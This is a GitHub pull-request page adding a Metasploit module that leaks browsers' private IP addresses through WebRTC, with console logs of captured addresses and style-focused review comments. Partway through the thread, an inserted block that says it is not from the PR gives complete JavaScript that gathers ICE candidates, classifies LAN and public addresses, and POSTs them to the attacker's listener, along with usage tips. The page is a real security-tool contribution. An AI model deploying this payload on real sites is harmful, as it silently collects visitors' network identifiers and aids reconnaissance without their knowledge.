
Private IP Leakage using WebRTC (CVE-2018-6849) #9823

Merged: 8 commits, Apr 11, 2018

Conversation

@RootUp (Contributor) commented Apr 6, 2018

This library module will take advantage of WebRTC function in browsers to get private IP of the user/victim.

Verification

  • Start msfconsole
  • use auxiliary/gather/browser_lanipleak
  • set SRVHOST <IP of MSF system to act as server>
  • set SRVPORT <port of MSF system to act as server>
  • run
msf auxiliary(gather/browser_getprivateip) > 
[*] Using URL: http://172.20.10.2:8080/
[*] Server started.

msf auxiliary(gather/browser_getprivateip) >



msf auxiliary(gather/browser_getprivateip) > 
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Sending response (2523 bytes)
[*] 172.20.10.2: Received reply:
POST / HTTP/1.1
Host: 172.20.10.2:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.20.10.2:8080/
Content-Length: 11
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

172.20.10.2

msf auxiliary(gather/browser_getprivateip) >

Note that there are some edge cases with this code. For example, it doesn't work on Firefox ESR on Kali 1.0.6.

),
'License' => MSF_LICENSE,
'Author' => [
'Brendan Coles', #MSF Module

@bcoles (Contributor) Apr 6, 2018

Thanks, but I did nothing. I literally grabbed the first chunk of JS I found on GitHub and slapped it in the module.

send_response(cli, @html)
when 'post'
print_status("#{cli.peerhost}: Received reply:")
puts request.to_s

@bcoles (Contributor) Apr 6, 2018

Please tidy up the output.

The print_* methods are preferred over puts.

Consider augmenting the JS to send a JSON object, and parsing the JS object here for output with print_good or print_line.
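An added example, written for this page and not the module's own JavaScript or the snippet it reuses: the browser side of the WebRTC leak described in the PR description, with a parser for ICE candidate lines and the JSON report suggested in the review above. The STUN server URL, the IP regexes, the report field names and the POST path are assumptions made for the example; the sample candidate lines are constructed. It also goes beyond the thread in one respect: later browsers mask host candidates behind mDNS `.local` names, so the classifier reports those separately instead of treating them as a LAN address.

```javascript
// Added example (not from the PR): WebRTC ICE-candidate harvesting with a
// candidate parser and a JSON report. Regexes, STUN URL, field names and the
// POST path are assumptions for this example.

// Assumed matchers. The IPv6 one accepts "::" compression, which a strict
// eight-group pattern would miss.
const IPV4_RE = /^(?:25[0-5]|2[0-4][0-9]|1?[0-9]?[0-9])(?:\.(?:25[0-5]|2[0-4][0-9]|1?[0-9]?[0-9])){3}$/;
const IPV6_RE = /^[0-9a-f]{0,4}(?::[0-9a-f]{0,4}){2,7}$/i;

function isIp(s) {
  return IPV4_RE.test(s) || IPV6_RE.test(s);
}

// Parse one SDP ICE candidate line (RFC 5245 grammar):
// "candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ..."
function parseCandidate(line) {
  const f = line.trim().replace(/^a=/, '').split(/\s+/);
  if (f.length < 8 || !f[0].startsWith('candidate:') || f[6] !== 'typ') return null;
  return { address: f[4], port: Number(f[5]), transport: f[2].toLowerCase(), type: f[7] };
}

// What a candidate reveals about the client:
//   lan    - host candidate carrying a real interface address (the leak)
//   mdns   - host candidate masked as <uuid>.local by the browser
//   public - server-reflexive candidate, i.e. the address seen by the STUN server
function classify(cand) {
  if (!cand) return 'invalid';
  if (cand.address.endsWith('.local')) return 'mdns';
  if (cand.type === 'host') return isIp(cand.address) ? 'lan' : 'invalid';
  if (cand.type === 'srflx') return 'public';
  if (cand.type === 'relay') return 'relay';
  return 'other';
}

// Fold candidate lines into the JSON object the listener would receive,
// de-duplicating addresses (each interface yields one candidate per component).
function buildReport(lines) {
  const report = { lan: [], public: [], mdns: [] };
  for (const line of lines) {
    const cand = parseCandidate(line);
    const kind = classify(cand);
    if (kind in report && !report[kind].includes(cand.address)) report[kind].push(cand.address);
  }
  return report;
}

// Browser side: open a throw-away peer connection so ICE gathering runs, collect
// every candidate, then POST the report. Calls done(null) where WebRTC is absent.
function leakLocalIps(postUrl, done) {
  if (typeof RTCPeerConnection === 'undefined') return done(null);
  const pc = new RTCPeerConnection({ iceServers: [{ urls: 'stun:stun.l.google.com:19302' }] }); // assumed STUN server
  const lines = [];
  pc.createDataChannel('');                     // any media/data section triggers gathering
  pc.onicecandidate = (ev) => {
    if (ev.candidate) { lines.push(ev.candidate.candidate); return; }
    pc.close();                                 // null candidate: gathering finished
    const report = buildReport(lines);
    fetch(postUrl, { method: 'POST', headers: { 'Content-Type': 'application/json' },
                     body: JSON.stringify(report) }).finally(() => done(report));
  };
  pc.createOffer().then((offer) => pc.setLocalDescription(offer));
}

// Constructed sample candidates, as a browser might hand them to onicecandidate.
const SAMPLE_CANDIDATES = [
  'candidate:842163049 1 udp 1677729535 192.168.1.104 54321 typ host generation 0',
  'candidate:842163049 2 udp 1677729535 192.168.1.104 54322 typ host generation 0',
  'candidate:1510613869 1 udp 2122262783 2001:db8:90d7:3889:2388:3f57:fe98:1 54323 typ host',
  'candidate:2 1 udp 1686052607 203.0.113.7 3478 typ srflx raddr 192.168.1.104 rport 54321',
  'candidate:3 1 udp 2122260223 a1b2c3d4-e5f6-4a7b-8c9d-0e1f2a3b4c5d.local 60000 typ host',
  'not a candidate at all',
];
```

In a page served by the listener, `leakLocalIps('/', (r) => console.log(r))` runs the whole exchange; on the server side the body is then one JSON object rather than one bare IP per request, which is what the review asks for. Note that with mDNS-masked host candidates only the `public` list still carries an address, so a listener should not assume the `lan` list is non-empty.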

info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",
'Description' => %q(
This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.

@bcoles (Contributor) Apr 6, 2018

Please line wrap to max 120, preferably 80.

super(
update_info(
info,
'Name' => "Private IP Leakage to WebPage using WebRTC Function.",

@bcoles (Contributor) Apr 6, 2018

Single quotes are preferred over double quotes when string interpolation is not required.

Also, remove the fullstop .

Also, module names are generally short and descriptive, rather than a sentence. Consider Browser LAN IP Leak or something.

[ 'CVE', '2018-6849' ],
['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
],
'DisclosureDate' => 'Jan 26 2018',

@bcoles (Contributor) Apr 6, 2018

This should probably be the date the WebRTC IP leak technique was published. The first instance I'm aware of was from https://github.com/natevw some time around 2014.


RootUp added 3 commits Apr 6, 2018
@RootUp (Contributor, Author) commented Apr 6, 2018

Works perfectly for now.

msf > use auxiliary/gather/browser_lanipleak 
msf auxiliary(gather/browser_lanipleak) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf auxiliary(gather/browser_lanipleak) > set URIPATH /
URIPATH => /
msf auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(gather/browser_lanipleak) > 
[*] Using URL: http://127.0.0.1:8080/
[*] Server started.

msf auxiliary(gather/browser_lanipleak) > 
[*] 127.0.0.1: Sending response (2523 bytes)
[*] 127.0.0.1: Sending response (2523 bytes)
[*] 127.0.0.1: Received reply:
POST / HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/
Content-Length: 13
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive

192.168.1.104

msf auxiliary(gather/browser_lanipleak) >
@s0m3gai commented Apr 7, 2018

Neat! Just needs docs (example), looks like... 👍

RootUp added 2 commits Apr 10, 2018
Changed title name and description; however, a few things still need to be fixed.
@RootUp (Contributor, Author) commented Apr 10, 2018

So the output looks something like this for now,

msf auxiliary(gather/browser_lanipleak) > 
[*] Using URL: http://192.168.1.104:8080/
[*] Server started.

msf auxiliary(gather/browser_lanipleak) > 
[*] 192.168.1.103: Sending response (2523 bytes)
[*] 192.168.1.103: Sending response (2523 bytes)
[*] 192.168.1.103: Received reply:
Fetched Private IP: 192.168.1.103
[*] 192.168.1.103: Received reply:
Fetched Private IP: 2001:0:9d38:90d7:3889:2388:3f57:fe98

msf auxiliary(gather/browser_lanipleak) >
@bcoles (Contributor) commented Apr 10, 2018

Looking good.

I made some minor changes, like fixing up formatting.

I also removed the requirement for ipaddr. Instead, the module uses the same regex that's used in the JavaScript.

It was meant to be a PR on your repo, but apparently the GitHub web interface doesn't work like that, and it landed directly into your branch. My bad!

@bcoles (Contributor) commented Apr 10, 2018

msf5 auxiliary(gather/browser_lanipleak) > run
[*] Auxiliary module running as background job 1.

[*] Using URL: http://0.0.0.0:8080/asdf
[*] Local IP: http://172.16.191.188:8080/asdf
[*] Server started.

msf5 auxiliary(gather/browser_lanipleak) > [*] 172.16.191.135: Sending response (2523 bytes)
[+] 172.16.191.135: Found IP address: 172.16.191.135
[*] 172.16.191.208: Sending response (2523 bytes)
[+] 172.16.191.208: Found IP address: 172.16.191.208
[+] 172.16.191.208: Found IP address: 172.16.191.178
Interrupt: use the 'exit' command to quit
@RootUp (Contributor, Author) commented Apr 11, 2018

Okay, I have added documentation for the same; please advise whether we are good to land here!

@acammack-r7 acammack-r7 merged commit 8b6bfcb into rapid7:master Apr 11, 2018
3 checks passed
  • Metasploit Automation - Sanity Test Execution: Successfully ran sanity checks.
  • Metasploit Automation - Test Execution: Successfully ran `autoPayloadTest.py`.
  • continuous-integration/travis-ci/pr: The Travis CI build passed
acammack-r7 added a commit that referenced this pull request Apr 11, 2018
@acammack-r7 (Contributor) commented Apr 11, 2018

Thanks for the module! I added 7e4caa1 to give a little more sample output in the module documentation.

@acammack-r7 acammack-r7 self-assigned this Apr 11, 2018
@acammack-r7 (Contributor) commented Apr 11, 2018

Release Notes

The auxiliary/gather/browser_lanipleak module has been added to the framework. This module leaks the local IPs of WebRTC-enabled browsers.

msjenkins-r7 added a commit that referenced this pull request Apr 12, 2018
5 participants